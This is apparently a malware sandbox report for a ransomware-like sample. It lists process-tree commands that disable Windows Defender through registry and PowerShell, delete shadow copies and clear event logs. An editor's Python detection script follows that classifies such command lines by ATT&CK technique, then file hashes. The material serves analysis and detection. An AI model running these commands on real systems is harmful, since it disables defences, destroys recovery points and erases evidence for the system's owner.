C:\Windows\SysWOW64\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1808
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:2296
-
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3088 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:3252 -
C:\Windows\SysWOW64\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵
- Modifies registry class
PID:1384 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2148
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3836
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:2216
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3820
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:388 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:980
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:3500 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2716 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3164 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1764 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3104 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2116
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:1852 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2424
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3564 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1588
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:752
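Triage note added by the editor; this is not part of the sandbox output. The child processes above are a textbook pre-encryption sequence: stop backup and VSS-related services, neutralise Defender through policy keys, service Start=4 and disabled scheduled tasks, strip its definitions, then delete shadow copies and clear the System, Security and Application logs so the host cannot recover or be investigated. The Python below is a constructed detection example (not code from the sandbox vendor or the sample) that classifies command lines of this kind from process-creation telemetry and raises a combined verdict when defence impairment and recovery inhibition co-occur in one session. The sample lines are copied from the tree above plus one benign control; the rule labels, the verdict threshold and the expectation that shadow-copy deletion by itself only rates "review" are the editor's own choices, and the ATT&CK IDs use the current sub-technique numbering rather than the pre-sub-technique labels of the v6 matrix the report refers to.

```python
import re

# Constructed sample input: one process-creation command line per entry,
# copied from the sandbox process tree above plus a benign control line.
# This is not an exported log.
SAMPLE_COMMANDS = [
    'net.exe stop "UnistoreSvc_12e21" /y',
    'sc.exe config "VSS" start= disabled',
    'sc.exe config "wbengine" start= disabled',
    'reg.exe add "HKLM\\Software\\Policies\\Microsoft\\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f',
    'reg.exe add "HKLM\\System\\CurrentControlSet\\Services\\WinDefend" /v "Start" /t REG_DWORD /d "4" /f',
    'schtasks.exe /Change /TN "Microsoft\\Windows\\Windows Defender\\Windows Defender Scheduled Scan" /Disable',
    'vssadmin.exe delete shadows /all /quiet',
    'wevtutil.exe cl security',
    'wmic.exe shadowcopy delete',
    '"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All',
    'powershell Set-MpPreference -DisableRealtimeMonitoring $true',
    'notepad.exe C:\\Users\\user\\notes.txt',  # benign control, must not match
]

# (ATT&CK ID + editor's label, pattern). Labels and thresholds are the
# editor's assumptions; IDs are the sub-technique numbering of current
# ATT&CK versions, not the v6 labels used by the report's matrix.
RULES = [
    ("T1490 Inhibit System Recovery: shadow copies deleted",
     re.compile(r'\b(vssadmin(\.exe)?\s+delete\s+shadows|wmic(\.exe)?\s+shadowcopy\s+delete)', re.I)),
    ("T1490 Inhibit System Recovery: backup/VSS service disabled",
     re.compile(r'\bsc(\.exe)?\s+config\s+"?(VSS|wbengine|vmicvss|SDRSVC)"?\s+start=\s*disabled', re.I)),
    ("T1070.001 Indicator Removal: Windows event log cleared",
     re.compile(r'\bwevtutil(\.exe)?\s+cl\s+\w+', re.I)),
    ("T1562.001 Impair Defenses: Defender policy key written",
     re.compile(r'\breg(\.exe)?\s+add\s+"?HKLM\\Software\\Policies\\Microsoft\\Windows Defender', re.I)),
    ("T1562.001 Impair Defenses: Defender service/driver Start set to 4",
     re.compile(r'\breg(\.exe)?\s+add\s+"?HKLM\\System\\CurrentControlSet\\Services\\'
                r'(WinDefend|WdBoot|WdFilter|WdNisDrv|WdNisSvc|SecurityHealthService)"?\s.*?/v\s+"?Start"?\s.*?/d\s+"?4"?', re.I)),
    ("T1562.001 Impair Defenses: Defender scheduled task disabled",
     re.compile(r'\bschtasks(\.exe)?\s+/Change\s+/TN\s+"?Microsoft\\Windows\\(Windows Defender|ExploitGuard)\\.*/Disable\b', re.I)),
    ("T1562.001 Impair Defenses: Defender definitions removed",
     re.compile(r'MpCmdRun(\.exe)?"?\s+-RemoveDefinitions\b', re.I)),
    ("T1562.001 Impair Defenses: Set-MpPreference disables a protection feature",
     re.compile(r'Set-MpPreference\s+-Disable\w+\s+\$true\b', re.I)),
    ("T1489 Service Stop",
     re.compile(r'\bnet1?(\.exe)?\s+stop\s+', re.I)),
]


def classify(cmdline):
    """Return the labels of every rule that matches one command line."""
    return [label for label, rx in RULES if rx.search(cmdline)]


def triage(commands):
    """Classify a session's command lines and produce a verdict.

    The verdict is 'ransomware-prep' only when both defence impairment
    (T1562.001) and recovery inhibition (T1490) are present, because a lone
    vssadmin call also appears in legitimate backup maintenance. Anything
    else that matched at least one rule is 'review'; nothing matched is 'clean'.
    """
    hits = {}
    for cmd in commands:
        for label in classify(cmd):
            hits.setdefault(label, []).append(cmd)
    techniques = sorted({label.split()[0] for label in hits})
    if {"T1562.001", "T1490"} <= set(techniques):
        verdict = "ransomware-prep"
    elif techniques:
        verdict = "review"
    else:
        verdict = "clean"
    return {"hits": hits, "techniques": techniques, "verdict": verdict}


if __name__ == "__main__":
    result = triage(SAMPLE_COMMANDS)
    print("verdict:", result["verdict"])
    print("techniques:", ", ".join(result["techniques"]))
    for label, cmds in result["hits"].items():
        for cmd in cmds:
            print(f"  [{label}] {cmd}")
```

The rules are deliberately anchored on the specific service names, registry paths and task names seen in this tree, so a single match is informative on its own; the session-level verdict is where the value lies, since each command alone (a `net stop`, a `reg add`, a `wevtutil cl`) also occurs in administration. Feed it the CommandLine field from Sysmon event ID 1 or Windows Security event 4688 grouped per parent process to reproduce the logic on real telemetry.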
Network
MITRE ATT&CK Enterprise v6
Downloads
-
MD5 1c19c16e21c97ed42d5beabc93391fc5
SHA1 8ad83f8e0b3acf8dfbbf87931e41f0d664c4df68
SHA256 1bcd97396c83babfe6c5068ba590d7a3f8b70e72955a9d1e4070648e404cbf05
SHA512 7d18776d8f649b3d29c182ff03efc6cea8b527542ee55304980f24577aae8b64e37044407776e220984346c3998ace5f8853afa58c8b38407482a728e9495e0c
-
MD5 fb44fe9383f6343a0156b34f4330ea68
SHA1 d8d431b400c96d4875538ddd005249827d285dd6
SHA256 e5e1663f8030537f920c75460631d7bbfc70c5ecbfc91a711e2a8756bcc1cf2e
SHA512 e80ea3407953d5a25c513018b98593225b0e3e78b19d586d81d7e24ec16c95b79b46261e035083f4db8b7409760d87a8ba268b96add55098fa82a5624f9964a5